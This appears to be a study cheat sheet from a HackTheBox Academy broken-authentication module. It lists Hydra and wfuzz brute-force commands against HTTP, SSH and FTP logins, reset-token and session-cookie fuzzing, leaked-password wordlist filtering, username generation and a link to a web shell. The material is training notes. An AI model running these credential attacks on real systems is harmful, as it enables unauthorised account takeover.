Broken Auth
// default credentials
https://www.cirt.net/passwords
// based on CIRT
https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv
https://github.com/scadastrangelove/SCADAPASS/blob/master/scadapass.csv
https://academy.hackthebox.com/storage/modules/80/scripts/basic_bruteforce_py.txt
https://academy.hackthebox.com/storage/modules/80/scripts/basic_bruteforce_php.txt
curl 'http://URL:PORT/login.php' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://URL:PORT' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://URL:PORT/login.php' -H 'Cookie: PHPSESSID=8iafr4t6c3s2nhkaj63df43v05' -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-GPC: 1' --data-raw 'username=test&password=test'
// rate limit check
https://academy.hackthebox.com/storage/modules/80/scripts/rate_limit_check_py.txt
// launch username attack
https://github.com/danielmiessler/SecLists/tree/master/Usernames
// wfuzz
wfuzz -c -z file,/opt/useful/SecLists/Usernames/top-usernames-shortlist.txt -d "Username=FUZZ&Password=dummypass" --hs "Unknown username" http://brokenauthentication.hackthebox.eu/user_unknown.php
// timing attack
https://academy.hackthebox.com/storage/modules/80/scripts/timing_py.txt
// timing app
https://academy.hackthebox.com/storage/modules/80/scripts/timing_php.txt
//timing example
python3 timing.py /opt/useful/SecLists/Usernames/top-usernames-shortlist.txt
// Unix grep is not the fastest tool but allows us to do the job quickly using POSIX regular expressions.
//take a giant wordlist and extract only passwords that match this policy.
grep '[[:upper:]]' rockyou.txt | grep '[[:lower:]]' | grep -E '^.{8,12}$'
// password policy script
https://academy.hackthebox.com/storage/modules/80/password_policy_php.txt
cat /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-50.txt | grep '[[:upper:]]' | grep '[[:digit:]]' | grep -E '^.{1,25}$' >password.txt
// token attack
https://academy.hackthebox.com/storage/modules/80/scripts/reset_token_time_php.txt
// brute force
https://academy.hackthebox.com/storage/modules/80/scripts/reset_token_time_py.txt
wfuzz -z range,00000-99999 --ss "Valid" "https://brokenauthentication.hackthebox.eu/token.php?user=admin&token=FUZZ"
// guessable answers
https://academy.hackthebox.com/storage/modules/80/scripts/predictable_questions_php.txt
// python script
https://academy.hackthebox.com/storage/modules/80/scripts/predictable_questions_py.txt
// inject username
https://academy.hackthebox.com/storage/modules/80/scripts/username_injection_php.txt
https://academy.hackthebox.com/storage/modules/80/scripts/username_injection_py.txt
// cookie session decode
echo -n 757365723A6874623B726F6C653A75736572 | xxd -r -p; echo
https://en.wikipedia.org/wiki/List_of_file_signatures
// CyberChef offers a massive list of decoders,
// but they should be used manually and checked one at a time.
https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)To_Hex('Space',0)Gunzip(/breakpoint)&input=SDRzSUFDNGtLR0FBL3dYQU1RMEFBQURDTUxVb29QYVB4UzRNZm4vWUJBQUFBQT09
// By pausing To hex and activating Gunzip inside the CyberChef recipe
// we just linked, we can see that it is indeed gzipped content.
// Decodify is a tool written to automate decode guessing
https://github.com/s0md3v/Decodify
// Checking Wikipedia List of file signatures page looking for those two bytes,
// also called Magic bytes
https://academy.hackthebox.com/storage/modules/80/scripts/automate_cookie_tampering_py.txt
// fuzzing session cookie
john --incremental=LowerNum --min-length=6 --max-length=6 --stdout| wfuzz -z stdin -b HTBSESS=FUZZ --ss "Welcome" -u https://brokenauthentication.hackthebox.eu/profile.php
https://academy.hackthebox.com/storage/modules/80/scripts/bruteforce_cookie_php.txt
// brute force with Hydra
hydra -C /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 178.211.23.155 -s 31099 http-get /
hydra -L /opt/useful/SecLists/Usernames/Names/names.txt -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -u -f 178.35.49.134 -s 32901 http-get /
ravenloft@htb[/htb]$ hydra -L /opt/useful/SecLists/Usernames/Names/usernames.txt -p amormio -u -f 178.35.49.134 -s 32901 http-get /
// shell - b374k shell that might allow us to execute OS commands directly.
https://github.com/b374k/b374k
// supported services of hydra
hydra -h | grep "Supported services" | tr ":" "\n" | tr " " "\n" | column -e
/login.php:[user parameter]=^USER^&[password parameter]=^PASS^:[FAIL/SUCCESS]=[success/failed string]
// syntax for http-post
"/login.php:[user parameter]=^USER^&[password parameter]=^PASS^:F=<form name='login'"
"/login.php:username=^USER^&password=^PASS^:F=<form name='login'"
// bruce login.php and using admin as username
hydra -l admin -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 167.99.192.192 -s 32414 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"
// cupp - common user password profiler
cupp -i
sed -ri '/^.{,7}$/d' william.txt # remove shorter than 8
sed -ri '/[!-/:-@\[-`\{-~]+/!d' william.txt # remove no special chars
sed -ri '/[0-9]+/!d' william.txt # remove no numbers
//mangling
https://github.com/digininja/RSMangler
https://github.com/sc0tfree/mentalist.git
// One such tool we can use is Username Anarchy to create the list of potential usernames
git clone https://github.com/urbanadventurer/username-anarchy.git
./username-anarchy Bill Gates > bill.txt
// SSH bruteforce
hydra -L bill.txt -P william.txt -u -f ssh://178.35.49.134:22 -t 4
// FTP bruteforce
hydra -l m.gates -P rockyou-10.txt ftp://127.0.0.1
// bruteforce basic Auth webserver!!
hydra -C /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 178.128.35.43 -s 32273 http-get /
// hydra brute with header and http-post - make sure to look at parameters (Burp)
hydra -l user -P /opt/useful/SecLists/Passwords/probable-v2-top12000.txt -f 178.128.35.43 -s 32273 http-post-form "/admin_login.php:user=user&pass=^PASS^:H=Authorization\: Basic dXNlcjpwYXNzd29yZA==:F=<form name='log-in'"
// Final
wfuzz -v -c -z file,country2.txt -b "htb_sessid=ZWUxMWNiYjE5MDUyZTQwYjA3YWFjMGNhMDYwYzIzZWU%3D;" -d "user=support.FUZZ&message=testing&submit=submit" --hs "Cannot send message" http://157.245.43.134:30524/messages.php
grep -E '^[A-Z]' /usr/share/wordlists/rockyou.txt | grep '[0-9]$' | grep '[^A-Za-z0-9]' | awk 'length >= 20 && length <= 29'keep track of tests
Last updated
Was this helpful?